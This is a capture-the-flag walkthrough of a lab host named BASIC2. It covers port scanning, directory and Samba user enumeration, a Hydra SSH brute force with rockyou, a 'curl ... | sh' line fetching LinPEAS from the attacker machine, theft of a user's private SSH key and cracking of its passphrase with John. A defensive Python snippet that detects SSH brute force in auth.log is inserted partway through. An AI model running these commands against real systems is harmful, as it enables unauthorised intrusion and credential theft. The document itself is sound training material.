IP=10.10.88.88
nmap -sV -Pn -vv -oA 'nmap_scans' 10.10.88.88
Output:
# Nmap 7.92 scan initiated Mon Apr 25 06:16:56 2022 as: nmap -sV -Pn -vv -oA nmap_scans 10.10.88.88
Nmap scan report for 10.10.88.88 (10.10.88.88)
Host is up, received user-set (0.024s latency).
Scanned at 2022-04-25 06:16:57 EDT for 15s
Not shown: 994 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu))
139/tcp open netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
8009/tcp open ajp13 syn-ack Apache Jserv (Protocol v1.3)
8080/tcp open http syn-ack Apache Tomcat 9.0.7
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Apr 25 06:17:12 2022 -- 1 IP address (1 host up) scanned in 16.01 seconds
What is the name of the hidden directory on the web server (enter name without /)?
From the scan above there is a web server open on port 80, so let's investigate it.
The default page says the site is undergoing maintenance. Its source contains:
<html>
<h1>Undergoing maintenance</h1>
<h4>Please check back later</h4>
<!-- Check our dev note section if you need to know what to work on. -->
</html>
This could be of use later...
Let's run a gobuster scan to see what paths can be enumerated:
gobuster dir -u http://10.10.88.88 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | tee scan.txt
Output:
/development (Status: 301) [Size: 316] [--> http://10.10.88.88/development/]
There doesn't seem to be any website login to brute force, so I'll try to brute force the SSH port instead.
First I need to find a username, as without one Hydra will take a while...
Let's use enum4linux:
enum4linux -a 10.10.88.88 | tee enum4linux.txt
Here we see:
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
So the user we are trying to crack is jan (as they have the weak hash...):
hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.88.88 -t 4 ssh -vvv
After a while this returns:
[22][ssh] host: 10.10.88.88 login: jan password: armando
We have our password!
Let's log in with SSH:
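A run like the Hydra one above leaves a trail of "Failed password" lines in sshd's log. As an added example (not part of the original writeup), the following Python parses constructed auth.log lines and flags any source/account pair with a burst of failures inside a short window, noting whether the same source then authenticated successfully. Hostname, PIDs and IPs in the sample are made up.

```python
import re
from collections import defaultdict
from datetime import datetime
# Constructed sample auth.log lines (not from the original page): a burst of
# failures for one account from one source followed by a success, plus noise.
SAMPLE_LOG = """\
Apr 25 08:01:01 basic2 sshd[1201]: Failed password for jan from 10.10.10.10 port 50110 ssh2
Apr 25 08:01:01 basic2 sshd[1203]: Failed password for jan from 10.10.10.10 port 50112 ssh2
Apr 25 08:01:02 basic2 sshd[1205]: Failed password for jan from 10.10.10.10 port 50114 ssh2
Apr 25 08:01:02 basic2 sshd[1207]: Failed password for jan from 10.10.10.10 port 50116 ssh2
Apr 25 08:01:03 basic2 sshd[1209]: Failed password for jan from 10.10.10.10 port 50118 ssh2
Apr 25 08:01:03 basic2 sshd[1211]: Accepted password for jan from 10.10.10.10 port 50120 ssh2
Apr 25 08:05:00 basic2 sshd[1300]: Failed password for kay from 10.10.10.20 port 40000 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: (?P<result>Failed|Accepted) "
    r"password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+ ssh2$"
)
def parse(log_text, year=2022):
    """Return (timestamp, result, user, ip) for each sshd password event."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:  # syslog lines carry no year, so one is supplied
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["result"], m["user"], m["ip"]))
    return events

def detect_bruteforce(events, threshold=5, window_s=60):
    """Flag (ip, user) pairs with >= threshold failures inside a sliding window
    and note whether that source later authenticated successfully."""
    failures, successes = defaultdict(list), set()
    for ts, result, user, ip in events:
        if result == "Failed":
            failures[(ip, user)].append(ts)
        else:
            successes.add((ip, user))
    alerts = {}
    for key, times in failures.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while (t - times[start]).total_seconds() > window_s:
                start += 1  # drop failures that fell out of the window
            if end - start + 1 >= threshold:
                alerts[key] = {"failures": end - start + 1, "later_success": key in successes}
                break
    return alerts
```

Running `detect_bruteforce(parse(SAMPLE_LOG))` reports only the jan/10.10.10.10 pair; the single kay failure stays below the threshold.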
ssh jan@10.10.88.88
Let's enumerate with LinPEAS:
# Local network
sudo python -m http.server 80 #Host
curl 10.10.10.10/linpeas.sh | sh #Victim
LinPEAS shows that jan can access kay's home directory. In there we find a private SSH key, so we copy it over to our attack machine.
ssh -i ssh_key kay@10.10.88.88
Enter passphrase for key 'ssh_key':
The key needs a passphrase. Let's use John the Ripper:
python /usr/share/john/ssh2john.py ssh_key > forjohn.txt
john --wordlist=/usr/share/wordlists/rockyou.txt forjohn.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
beeswax (ssh_key)
1g 0:00:00:00 DONE (2022-04-25 08:12) 20.00g/s 1654Kp/s 1654Kc/s 1654KC/s behlat..bball40
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
We have the SSH key passphrase, beeswax. Let's use it to log in.
And we are in!
In kay's home directory there is one file:
kay@basic2:~$ ls
pass.bak
kay@basic2:~$ cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
This is the final password we need.